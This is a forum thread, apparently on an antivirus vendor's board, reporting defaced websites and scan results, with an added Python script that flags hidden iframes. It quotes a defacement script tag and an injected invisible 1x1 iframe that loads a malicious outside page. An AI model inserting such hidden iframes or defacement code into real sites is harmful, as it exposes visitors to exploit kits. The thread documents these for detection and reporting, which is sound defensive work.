Avast does not detect LONG OVERDUE HTML_BACHACK.A site defacement

See: https://www.virustotal.com/en/url/599cf281a4816ffd34ab1f23bb4b75cb9e97417d48d7f2233a9a099c407aa262/analysis/1361719588/
and
https://www.virustotal.com/en/file/189f1de67a461769aa52ae30834adb93882393ee15952c5f50b32f80ee1831cf/analysis/
URL: htxp://www.edepot.com/graphics/flags/bangladesh.gif
Type: external element
Risk: benign → link rel=“SHORTCUT ICON” href=" on line 174
Line 3 in code:

 3: <  sc​ript > alert("Hacked By D€str0y€r s@m - BCA Hackers")< / sc​ript > 

Hacked and defaced site - malcreators/defacers = Bangladesh Cyber Army → http://pastebin.com/4DP0GxbY
Proof: http://www.zone-h.org/archive/notifier=bangladesh%20cyber%20army/page=37
Still active OVERDUE since 2012-11-26 15:48:03

polonus

Another one: https://www.virustotal.com/en/url/9e7055167702ae427676e9c1dfddc7e1f757833e0a256173e54d1b007f4f84ef/analysis/
Detected: http://www.urlvoid.com/scan/tarsudi.com/ Exploit.HTML.IFrame-6
Content after the < /html> tag should be considered suspicious.
< br />
53: < b> Fatal error< /b> : Call to undefined function wp() in < b> /home/refocatc/public_html/tarsudi dot com/wp-blog-header.php< /b> on line < b> 14< /b> < br />
54: < !–(62bf5e88d5)–> < if​rame src=“htxp://onemillionathome.com/salmon.php” width=1 height=1 style=“visibility: hidden”> < / if​rame > < !–(/62bf5e88d5)–>
Abuse Some PHP classes for dealing with Salmon (WP-plug-in), both original code and modified forks of stuff which is elsewhere. Packaged up as a Composer package, all PSR-0 compliant for awesome autoloading “and defacement abuse”. Nat Sakimura on indieweb " " added by me polonus…
and another similar defacement, see “through the eyes” of a file viewer: http://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fkampungkali.com%2F&ref_sel=Google&ua_sel=ff

polonus
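The two checks mentioned in the post above (content after the closing html tag, and a 1x1 hidden iframe) can be automated when auditing your own pages. This is an added example, not part of the original thread: the names `tiny`, `IframeAudit` and `audit` are hypothetical, and the sample page and its `example.invalid` hosts are constructed.

```python
import re
from html.parser import HTMLParser

# Constructed sample: a normal page followed by an injected trailer of the
# shape quoted in the thread (PHP error text plus a hidden iframe).
SAMPLE = """<html><head><title>Blog</title></head>
<body><p>Hello</p>
<iframe src="http://video.example.invalid/embed" width="560" height="315"></iframe>
</body></html>
<br />
<b>Fatal error</b>: Call to undefined function wp() in <b>/path/wp-blog-header.php</b><br />
<!--(0000000000)--><iframe src="http://injected.example.invalid/x.php" width=1 height=1 style="visibility: hidden"></iframe><!--(/0000000000)-->
"""

def tiny(value):
    """True when a width/height attribute is 0 or 1 (pixels or percent)."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1

class IframeAudit(HTMLParser):
    """Collects iframes that are rendered invisibly."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        if tiny(a.get("width")) and tiny(a.get("height")):
            reasons.append("1x1 or smaller")
        style = a.get("style", "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden by style")
        if reasons:
            self.findings.append((a.get("src", ""), reasons))

def audit(page):
    """Report trailing content after the last </html> and any hidden iframes."""
    closes = list(re.finditer(r"</html\s*>", page, re.I))
    cut = closes[-1].end() if closes else len(page)
    trailer = page[cut:]
    report = {"trailing_content": bool(trailer.strip()), "iframes": []}
    for where, chunk in (("document", page[:cut]), ("after </html>", trailer)):
        parser = IframeAudit()
        parser.feed(chunk)
        parser.close()
        report["iframes"] += [(where, s, r) for s, r in parser.findings]
    return report
```

Calling `audit(SAMPLE)` flags the trailer and the injected iframe while leaving the normally sized embed alone.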

VirusTotal
https://www.virustotal.com/en/file/52fcfc51c60af395cc4cf72b6a1cf2f77512f673a0e7312b81617e1275d21d0c/analysis/1361745269/

sucuri http://sitecheck.sucuri.net/results/tarsudi.com/

urlquery - Detected malicious iframe injection
http://urlquery.net/report.php?id=1106236

Hi Pondus,

Something weird on the Sucuri results: http://sitecheck.sucuri.net/results/tarsudi.com
PHP error: Fatal error: Call to undefined function wp() in /home/refo
List of iframes included → htxp://onemillionathome.com/salmon.php
scam site?: htxp://onemillionathome.com/images/
This web beacon found on there: hxtp://www.onemillionathome.com/images/spacer00.gif

polonus

Hi Polonus,

https://www.virustotal.com/ru/file/ea72b4b80602ae7f4718ca8b7691c8dc69a2d069e501ed86e28a384ef5b5b271/analysis/1361762283/

Sent DrWeb and Avast.

Exploit.BlackHole.12 - DrWeb
JS:Redirector-AGQ - Avast